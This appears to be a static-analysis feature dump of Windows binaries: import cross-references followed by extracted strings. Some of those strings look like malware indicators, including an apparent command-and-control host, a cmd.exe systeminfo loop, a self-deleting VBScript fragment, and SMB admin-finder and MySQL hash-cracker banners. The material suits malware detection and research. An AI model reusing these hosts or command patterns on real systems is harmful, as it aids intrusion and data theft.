sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
loc.140007bb8 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
loc.140008a30 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_SetUnhandledExceptionFilter
loc.140007bb8 sym.imp.KERNEL32.dll_GetCurrentProcess
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_GetCurrentProcess
loc.14003b400 sym.imp.KERNEL32.dll_GetCurrentProcess
loc.140007bb8 sym.imp.KERNEL32.dll_GetCurrentProcess
loc.14003b400 sym.imp.KERNEL32.dll_GetCurrentProcess
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_GetCurrentProcess
loc.140007bb8 sym.imp.KERNEL32.dll_TerminateProcess
loc.14003b400 sym.imp.KERNEL32.dll_TerminateProcess
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_TerminateProcess
loc.140007bb8 sym.imp.KERNEL32.dll_TerminateProcess
loc.14003b400 sym.imp.KERNEL32.dll_TerminateProcess
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_TerminateProcess
sub.KERNEL32.dll_IsProcessorFeaturePresent_4e0 sym.imp.KERNEL32.dll_IsProcessorFeaturePresent
sub.KERNEL32.dll_IsProcessorFeaturePresent_4e0 sym.imp.KERNEL32.dll_IsProcessorFeaturePresent
loc.140008650 sym.imp.KERNEL32.dll_QueryPerformanceCounter
loc.140008650 sym.imp.KERNEL32.dll_QueryPerformanceCounter
loc.140008650 sym.imp.KERNEL32.dll_GetCurrentProcessId
loc.140008650 sym.imp.KERNEL32.dll_GetCurrentProcessId
loc.140008650 sym.imp.KERNEL32.dll_GetCurrentThreadId
loc.140008650 sym.imp.KERNEL32.dll_GetCurrentThreadId
loc.140008650 sym.imp.KERNEL32.dll_GetSystemTimeAsFileTime
loc.140008650 sym.imp.KERNEL32.dll_GetSystemTimeAsFileTime
loc.140008748 sym.imp.KERNEL32.dll_InitializeSListHead
loc.140008748 sym.imp.KERNEL32.dll_InitializeSListHead
loc.140008974 sym.imp.KERNEL32.dll_GetStartupInfoW
sub.KERNEL32.dll_GetStartupInfoW_320 sym.imp.KERNEL32.dll_GetStartupInfoW
loc.140008974 sym.imp.KERNEL32.dll_GetStartupInfoW
sub.KERNEL32.dll_GetStartupInfoW_320 sym.imp.KERNEL32.dll_GetStartupInfoW
sub.KERNEL32.dll_GetModuleHandleW_379 sym.imp.KERNEL32.dll_GetModuleHandleW
sub.KERNEL32.dll_GetModuleHandleW_c58 sym.imp.KERNEL32.dll_GetModuleHandleW
sub.KERNEL32.dll_GetModuleHandleW_379 sym.imp.KERNEL32.dll_GetModuleHandleW
sub.KERNEL32.dll_GetModuleHandleW_c58 sym.imp.KERNEL32.dll_GetModuleHandleW
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetLastError
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetLastError_16b sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_GetLastError
loc.14003792c sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetLastError_f37 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetLastError_9c4 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_WriteFile_ad8 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_WriteFile_c20 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_WideCharToMultiByte_d84 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_SetFilePointerEx_708 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_SetFilePointerEx_7c8 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetLastError_16b sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetLastError_9c4 sym.imp.KERNEL32.dll_GetLastError
loc.14003792c sym.imp.KERNEL32.dll_GetLastError
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetLastError
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetLastError_f37 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_SetFilePointerEx_708 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_WriteFile_c20 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_WideCharToMultiByte_d84 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_WriteFile_ad8 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_SetFilePointerEx_7c8 sym.imp.KERNEL32.dll_GetLastError
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_HeapAlloc
sub.KERNEL32.dll_HeapAlloc_b2c sym.imp.KERNEL32.dll_HeapAlloc
sub.KERNEL32.dll_HeapAlloc_a31 sym.imp.KERNEL32.dll_HeapAlloc
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_HeapAlloc
sub.KERNEL32.dll_HeapAlloc_b2c sym.imp.KERNEL32.dll_HeapAlloc
sub.KERNEL32.dll_HeapAlloc_a31 sym.imp.KERNEL32.dll_HeapAlloc
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_HeapFree
loc.14003792c sym.imp.KERNEL32.dll_HeapFree
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_HeapFree
loc.14003792c sym.imp.KERNEL32.dll_HeapFree
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcessHeap
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcessHeap
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcessHeap
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcessHeap
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_VirtualQuery
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_VirtualQuery
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcAddress
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_FreeLibrary
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_FreeLibrary_40f sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_GetModuleHandleExW_820 sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_FreeLibrary_40f sym.imp.KERNEL32.dll_FreeLibrary
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_FreeLibrary
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_GetModuleHandleExW_820 sym.imp.KERNEL32.dll_FreeLibrary
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_FreeLibrary
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetProcAddress
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetProcAddress
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_GetModuleHandleExW_820 sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_VirtualQuery_518 sym.imp.KERNEL32.dll_GetProcAddress
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetProcAddress
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetProcAddress
sub.api_ms_win_core_registry_l1_1_0.dll_b6c sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_GetModuleHandleExW_820 sym.imp.KERNEL32.dll_GetProcAddress
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_GetProcAddress
loc.14003792c sym.imp.KERNEL32.dll_HeapFree
sub.KERNEL32.dll_RtlUnwindEx_53a sym.imp.KERNEL32.dll_RtlUnwindEx
sub.KERNEL32.dll_RtlUnwindEx_53a sym.imp.KERNEL32.dll_RtlUnwindEx
loc.140009f0c sym.imp.KERNEL32.dll_GetModuleFileNameW
loc.140009f0c sym.imp.KERNEL32.dll_GetModuleFileNameW
loc.140009f1c sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_LoadLibraryExW
loc.140009f1c sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_6dc sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetProcAddress_230 sym.imp.KERNEL32.dll_LoadLibraryExW
sub.KERNEL32.dll_GetLastError_16b sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_f37 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_f37 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_9c4 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_9c4 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_16b sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_9c4 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_9c4 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_f37 sym.imp.KERNEL32.dll_SetLastError
sub.KERNEL32.dll_GetLastError_f37 sym.imp.KERNEL32.dll_SetLastError
loc.14000a300 sym.imp.KERNEL32.dll_EnterCriticalSection
loc.14003f878 sym.imp.KERNEL32.dll_EnterCriticalSection
loc.140041d74 sym.imp.KERNEL32.dll_EnterCriticalSection
loc.14003f878 sym.imp.KERNEL32.dll_EnterCriticalSection
loc.14000a300 sym.imp.KERNEL32.dll_EnterCriticalSection
loc.140041d74 sym.imp.KERNEL32.dll_EnterCriticalSection
loc.14000a364 sym.imp.KERNEL32.dll_LeaveCriticalSection
loc.14003f8dc sym.imp.KERNEL32.dll_LeaveCriticalSection
loc.14003f8dc sym.imp.KERNEL32.dll_LeaveCriticalSection
loc.14000a364 sym.imp.KERNEL32.dll_LeaveCriticalSection
sub.KERNEL32.dll_DeleteCriticalSection_40a sym.imp.KERNEL32.dll_DeleteCriticalSection
sub.KERNEL32.dll_DeleteCriticalSection_9c3 sym.imp.KERNEL32.dll_DeleteCriticalSection
sub.KERNEL32.dll_DeleteCriticalSection_40a sym.imp.KERNEL32.dll_DeleteCriticalSection
sub.KERNEL32.dll_DeleteCriticalSection_9c3 sym.imp.KERNEL32.dll_DeleteCriticalSection
sub.InitializeCriticalSectionEx_900 sym.imp.KERNEL32.dll_InitializeCriticalSectionAndSpinCount
sub.InitializeCriticalSectionEx_488 sym.imp.KERNEL32.dll_InitializeCriticalSectionAndSpinCount
sub.InitializeCriticalSectionEx_900 sym.imp.KERNEL32.dll_InitializeCriticalSectionAndSpinCount
sub.InitializeCriticalSectionEx_488 sym.imp.KERNEL32.dll_InitializeCriticalSectionAndSpinCount
sub.FlsAlloc_865 sym.imp.KERNEL32.dll_TlsAlloc
sub.FlsAlloc_edc sym.imp.KERNEL32.dll_TlsAlloc
sub.FlsAlloc_865 sym.imp.KERNEL32.dll_TlsAlloc
sub.FlsAlloc_edc sym.imp.KERNEL32.dll_TlsAlloc
sub.FlsGetValue_2e9 sym.imp.KERNEL32.dll_TlsGetValue
sub.FlsGetValue_bc1 sym.imp.KERNEL32.dll_TlsGetValue
sub.FlsGetValue_bc1 sym.imp.KERNEL32.dll_TlsGetValue
sub.FlsGetValue_2e9 sym.imp.KERNEL32.dll_TlsGetValue
sub.FlsSetValue_ff sym.imp.KERNEL32.dll_TlsSetValue
sub.FlsSetValue_dd8 sym.imp.KERNEL32.dll_TlsSetValue
sub.FlsSetValue_dd8 sym.imp.KERNEL32.dll_TlsSetValue
sub.FlsSetValue_ff sym.imp.KERNEL32.dll_TlsSetValue
sub.FlsFree_224 sym.imp.KERNEL32.dll_TlsFree
sub.FlsFree_ae sym.imp.KERNEL32.dll_TlsFree
sub.FlsFree_ae sym.imp.KERNEL32.dll_TlsFree
sub.FlsFree_224 sym.imp.KERNEL32.dll_TlsFree
sub.KERNEL32.dll_GetStdHandle_210 sym.imp.KERNEL32.dll_GetStdHandle
sub.KERNEL32.dll_GetStdHandle_448 sym.imp.KERNEL32.dll_GetStdHandle
sub.KERNEL32.dll_GetStdHandle_210 sym.imp.KERNEL32.dll_GetStdHandle
sub.KERNEL32.dll_GetStdHandle_448 sym.imp.KERNEL32.dll_GetStdHandle
sub.KERNEL32.dll_GetModuleFileNameA_a7c sym.imp.KERNEL32.dll_GetModuleFileNameA
sub.KERNEL32.dll_GetModuleFileNameA_a7c sym.imp.KERNEL32.dll_GetModuleFileNameA
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_ExitProcess
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_ExitProcess
sub.KERNEL32.dll_GetModuleHandleExW_820 sym.imp.KERNEL32.dll_GetModuleHandleExW
sub.KERNEL32.dll_GetModuleHandleExW_820 sym.imp.KERNEL32.dll_GetModuleHandleExW
sub.KERNEL32.dll_GetACP_541 sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetACP_910 sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetACP_29c sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetLocaleInfoW_30 sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetACP_541 sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetACP_910 sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetACP_29c sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_GetLocaleInfoW_30 sym.imp.KERNEL32.dll_GetACP
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_OutputDebugStringW
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_OutputDebugStringW
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_WaitForSingleObjectEx
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_WaitForSingleObjectEx
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_CreateThread
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_CreateThread
sub.KERNEL32.dll_FindFirstFileExA_b20 sym.imp.KERNEL32.dll_FindClose
sub.KERNEL32.dll_FindFirstFileExW_d38 sym.imp.KERNEL32.dll_FindClose
sub.KERNEL32.dll_FindFirstFileExA_b20 sym.imp.KERNEL32.dll_FindClose
sub.KERNEL32.dll_FindFirstFileExW_d38 sym.imp.KERNEL32.dll_FindClose
sub.KERNEL32.dll_FindFirstFileExA_b20 sym.imp.KERNEL32.dll_FindFirstFileExA
sub.KERNEL32.dll_FindFirstFileExA_b20 sym.imp.KERNEL32.dll_FindFirstFileExA
sub.KERNEL32.dll_FindFirstFileExW_d38 sym.imp.KERNEL32.dll_FindFirstFileExW
sub.KERNEL32.dll_FindFirstFileExW_d38 sym.imp.KERNEL32.dll_FindFirstFileExW
sub.KERNEL32.dll_FindFirstFileExA_b20 sym.imp.KERNEL32.dll_FindNextFileA
sub.KERNEL32.dll_FindFirstFileExA_b20 sym.imp.KERNEL32.dll_FindNextFileA
sub.KERNEL32.dll_FindFirstFileExW_d38 sym.imp.KERNEL32.dll_FindNextFileW
sub.KERNEL32.dll_FindFirstFileExW_d38 sym.imp.KERNEL32.dll_FindNextFileW
sub.KERNEL32.dll_IsValidCodePage_8fb sym.imp.KERNEL32.dll_IsValidCodePage
sub.KERNEL32.dll_IsValidCodePage_8fb sym.imp.KERNEL32.dll_IsValidCodePage
sub.KERNEL32.dll_GetACP_910 sym.imp.KERNEL32.dll_GetOEMCP
sub.KERNEL32.dll_GetACP_910 sym.imp.KERNEL32.dll_GetOEMCP
sub.KERNEL32.dll_GetCPInfo_a60 sym.imp.KERNEL32.dll_GetCPInfo
sub.KERNEL32.dll_IsValidCodePage_8fb sym.imp.KERNEL32.dll_GetCPInfo
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_GetCPInfo
sub.KERNEL32.dll_IsValidCodePage_8fb sym.imp.KERNEL32.dll_GetCPInfo
sub.KERNEL32.dll_GetCPInfo_a60 sym.imp.KERNEL32.dll_GetCPInfo
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_GetCPInfo
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_GetEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_7df sym.imp.KERNEL32.dll_GetEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_GetEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_7df sym.imp.KERNEL32.dll_GetEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_FreeEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_7df sym.imp.KERNEL32.dll_FreeEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_FreeEnvironmentStringsW
sub.KERNEL32.dll_GetEnvironmentStringsW_7df sym.imp.KERNEL32.dll_FreeEnvironmentStringsW
sub.KERNEL32.dll_SetEnvironmentVariableA_6bc sym.imp.KERNEL32.dll_SetEnvironmentVariableA
sub.KERNEL32.dll_SetEnvironmentVariableA_6bc sym.imp.KERNEL32.dll_SetEnvironmentVariableA
sub.KERNEL32.dll_SetEnvironmentVariableW_5ee sym.imp.KERNEL32.dll_SetEnvironmentVariableW
sub.KERNEL32.dll_SetEnvironmentVariableW_5ee sym.imp.KERNEL32.dll_SetEnvironmentVariableW
sub.CompareStringEx_db1 sym.imp.KERNEL32.dll_CompareStringW
sub.CompareStringEx_db1 sym.imp.KERNEL32.dll_CompareStringW
sub.KERNEL32.dll_ExitProcess_718 sym.imp.KERNEL32.dll_ExitProcess
sub.LCMapStringEx_427 sym.imp.KERNEL32.dll_LCMapStringW
sub.LCMapStringEx_427 sym.imp.KERNEL32.dll_LCMapStringW
sub.GetLocaleInfoEx_96a sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.KERNEL32.dll_GetLocaleInfoW_30 sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.KERNEL32.dll_GetLocaleInfoW_30 sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.KERNEL32.dll_GetLocaleInfoW_140 sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.GetLocaleInfoEx_96a sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.KERNEL32.dll_GetLocaleInfoW_140 sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.KERNEL32.dll_GetLocaleInfoW_30 sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.KERNEL32.dll_GetLocaleInfoW_30 sym.imp.KERNEL32.dll_GetLocaleInfoW
sub.IsValidLocaleName_e0b sym.imp.KERNEL32.dll_IsValidLocale
sub.IsValidLocaleName_e0b sym.imp.KERNEL32.dll_IsValidLocale
sub.GetUserDefaultLocaleName_253 sym.imp.KERNEL32.dll_GetUserDefaultLCID
sub.GetUserDefaultLocaleName_253 sym.imp.KERNEL32.dll_GetUserDefaultLCID
loc.14003f9a0 sym.imp.KERNEL32.dll_EnumSystemLocalesW
sub.KERNEL32.dll_EnumSystemLocalesW_9c8 sym.imp.KERNEL32.dll_EnumSystemLocalesW
sub.KERNEL32.dll_EnumSystemLocalesW_ac8 sym.imp.KERNEL32.dll_EnumSystemLocalesW
loc.14003f9a0 sym.imp.KERNEL32.dll_EnumSystemLocalesW
sub.KERNEL32.dll_EnumSystemLocalesW_9c8 sym.imp.KERNEL32.dll_EnumSystemLocalesW
sub.KERNEL32.dll_EnumSystemLocalesW_ac8 sym.imp.KERNEL32.dll_EnumSystemLocalesW
sub.GetUserDefaultLocaleName_253 sym.imp.KERNEL32.dll_GetUserDefaultLCID
sub.KERNEL32.dll_GetStartupInfoW_320 sym.imp.KERNEL32.dll_GetFileType
sub.KERNEL32.dll_GetStdHandle_448 sym.imp.KERNEL32.dll_GetFileType
sub.KERNEL32.dll_GetStartupInfoW_320 sym.imp.KERNEL32.dll_GetFileType
sub.KERNEL32.dll_GetStdHandle_448 sym.imp.KERNEL32.dll_GetFileType
sub.LOL_12 sym.imp.ole32.dll_CoUninitialize
sub.LOL_12 sym.imp.ole32.dll_CoCreateInstance
sub.LOL_12 sym.imp.ole32.dll_CoCreateInstance
sub.LOL_12 sym.imp.ole32.dll_CoUninitialize
sub.LOL_12 sym.imp.ole32.dll_CoUninitialize
sub.LOL_12 sym.imp.ole32.dll_CoInitialize
sub.LOL_12 sym.imp.ole32.dll_CoInitialize

LANGUAGE:ENGLISH

Count Word
Unavailable profiler
Unavailable long
Unavailable mids
Unavailable nach
Unavailable help
Unavailable stud
Unavailable bool
Unavailable short
Unavailable operator
Unavailable mess
Unavailable cosh
Unavailable entia
Unavailable scram
Unavailable kernel
Unavailable turbo
Unavailable riff
Unavailable null
Unavailable char
Unavailable server
Unavailable double
Unavailable form
Unavailable gulp
Unavailable send
Unavailable junk
Unavailable void
Unavailable icon
Unavailable free
Unavailable crypt
Unavailable list
Unavailable warning
Unavailable main
Unavailable open
Unavailable cycle
Unavailable mask
Unavailable exit
Unavailable heart
Unavailable wake
Unavailable august
Unavailable sleep
Unavailable pulp
Unavailable baff
Unavailable conn
Unavailable plum
Unavailable tanh
Unavailable agen
Unavailable error
Unavailable cash
Unavailable ceil
Unavailable june
Unavailable march
Unavailable unknown
Unavailable sinh
Unavailable float
Unavailable starting
Unavailable floor
Unavailable system
Unavailable administrator
Unavailable volatile
Unavailable file

LANGUAGE:UNKNOWN

Count Word
Unavailable ~v<q
Unavailable }u!=
Unavailable xj4d
Unavailable 2.1]`
Unavailable d&h.
Unavailable a)'k
Unavailable y*tv
Unavailable ;1xi
Unavailable \$hd
Unavailable )dp^
Unavailable ufm9/ta
Unavailable ml=f
Unavailable o_jvj
Unavailable ?\nth
Unavailable hs[n
Unavailable 9zpe
Unavailable 9`bf
Unavailable download excuteencryptorfunctionpointer %d%s\\%s.lnkmac:%s-cpu:%s-hd:%sfeed back responce of hostget token at hostdwn md5 err\
Unavailable "(/t*
Unavailable %8 @
Unavailable cookies[\"zwiz\"]indexof(\"es-dn\")[\"keep-alive\"] == \"320\"pk
Unavailable clxzt/
Unavailable <of4`
Unavailable |$0-
Unavailable d$8e3
Unavailable m2pcu
Unavailable millisecsauthenticatenetuseipcfailed to authenticate tofailed to disconnect from%
Unavailable get_currentdomainabccbaspygateratabccbastubx.pdbmonikerstringvirustotal1s
Unavailable `.zylmi
Unavailable v{!-
Unavailable hjrchive
Unavailable ;l)f
Unavailable ole32.dll
Unavailable a4lc
Unavailable pa^_]
Unavailable &j0\v
Unavailable www.micro1.zyns.commozilla/4.0 (compatible; msie 8.0; win32)m
Unavailable 0a_a^_
Unavailable 7bhh
Unavailable 8]0d
Unavailable jz"/r
Unavailable xpj*e-
Unavailable l$de3
Unavailable q7e,
Unavailable c8<(u
Unavailable expr-v.1.2.u
Unavailable 0}k)gf
Unavailable cp.!
Unavailable :lip
Unavailable w!+'i
Unavailable k~je#>!
Unavailable \nuname -a\n\n/dev/shm/.x11.idlxmain64# \\u@\\h:\\w \\$ 0
Unavailable ciq|d
Unavailable id: 0x%xname: %scmd.exe /c for /l %%i in (1,1,%d) do if exist& systeminfo) else exitd
Unavailable c:el
Unavailable alo,x
Unavailable wscript.sleep 5000set fso = createobject(\"scripting.filesystemobject\")if(fso.fileexists(\"then fso.deletefile(\".\\/result?hl=en&id=%s
Unavailable $bpv(
Unavailable li;;<
Unavailable o2e%
Unavailable mh~f
Unavailable nfclient.dllrundllinstallarundlluninstalla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)/5.0 (compatible; msie 7.0;windows nt 5.1)1234567890123456\x00abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/\x00you specify service name not in svchost
Unavailable hkcufhtihsd
Unavailable dvsd
Unavailable accept-ranges: bytes
Unavailable xxxx
Unavailable 0`-g
Unavailable ~a{?!
Unavailable g&js]
Unavailable ~=rt
Unavailable the value of esp was not properly saved across a function call. this is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.
Unavailable frfz
Unavailable l$ wavawh
Unavailable \$ha
Unavailable [8ad
Unavailable @v8rw
Unavailable akur
Unavailable 3o*u
Unavailable /j.ls
Unavailable khrome crypt
Unavailable createstreamonhglobal
Unavailable zd(@0
Unavailable dvz!
Unavailable %xuy
Unavailable \uj:
Unavailable %zjr
Unavailable uk/m
Unavailable s(u2
Unavailable !=ilt
Unavailable invalid password hash: %s-= mysql hash cracker =- usage: %s hashhash: %08lx%08lxfound pass: pass not foundt
Unavailable f-a01wb
Unavailable avyo{bs
Unavailable t$ 3
Unavailable &sre
Unavailable u9sd
Unavailable [d)fj
Unavailable s:wk
Unavailable %.*
Unavailable *4go
Unavailable httpqueryinfoa
Unavailable char c = (i & 0xff);
Unavailable aaaa
Unavailable p\g3"
Unavailable j),!
Unavailable nv24
Unavailable registered to :
Unavailable x_^[d
Unavailable #%(v
Unavailable `dak
Unavailable hz1@
Unavailable gettimeformatw
Unavailable 'a6x
Unavailable fopen
Unavailable j/y(
Unavailable #n(p
Unavailable t9f;
Unavailable t1y943jihk09lkjdsmygamehavethisisasupernewgamenowbeginthis324newgameisapi_connectbd_sockbd_dnspcc_sockpcc_proxypcc_webproxy?hl=en&q=%s&meta=?hl=en&meta=miragefox_server.pdbavctest_gagaapp
Unavailable r!sctz
Unavailable }owm
Unavailable w7(
Unavailable ;2,"1
Unavailable &(g
Unavailable ]\g3
Unavailable r}lb
Unavailable pgs~
Unavailable ;jpc{
Unavailable j>v{`
Unavailable wdpf
Unavailable k"f!3
Unavailable *q=/gw
Unavailable `j@h
Unavailable '1u4
Unavailable qfgp
Unavailable f9)u h
Unavailable nf400z
Unavailable wu&s
Unavailable @rprr
Unavailable %33333
Unavailable fz2{
Unavailable gr>{
Unavailable ,ybpd<
Unavailable ugh95
Unavailable getlastactivepopup
Unavailable gj_v
Unavailable password <=14/%ldn.txtkill you\x00d
Unavailable d$@h;
Unavailable \s2%?
Unavailable yp~(
Unavailable w8m +
Unavailable $!8(
Unavailable (polyscrypt
Unavailable ihhc
Unavailable ;j9,xz
Unavailable 3voa
Unavailable #0;u`
Unavailable =8ts
Unavailable 43wl
Unavailable [thunk]:
Unavailable o $a
Unavailable smb share enumerator and admin finder hunt only runs on windows nt...user = %sadmin is %s\\%serror!!! bad host lookup. program terminate.error no.2!!! program terminate.local host name: %spacked by exe32pack 1.38local computer name: %slocal ip adress: %sarttrayhookdll.dll?terminatehook@@yaxxzs
Unavailable 9s,t
Unavailable >/%
Unavailable *xj')
Unavailable va2#
Unavailable 3}'b
Unavailable &+@_
Unavailable p216
Unavailable bxh{q
Unavailable jtbe
Unavailable not enough memory$-
Unavailable 956#bh"
Unavailable 9q$i
Unavailable *oj,
Unavailable n`aa
Unavailable y(k4
Unavailable a^a]a\
Unavailable 00dcm
Unavailable & \#
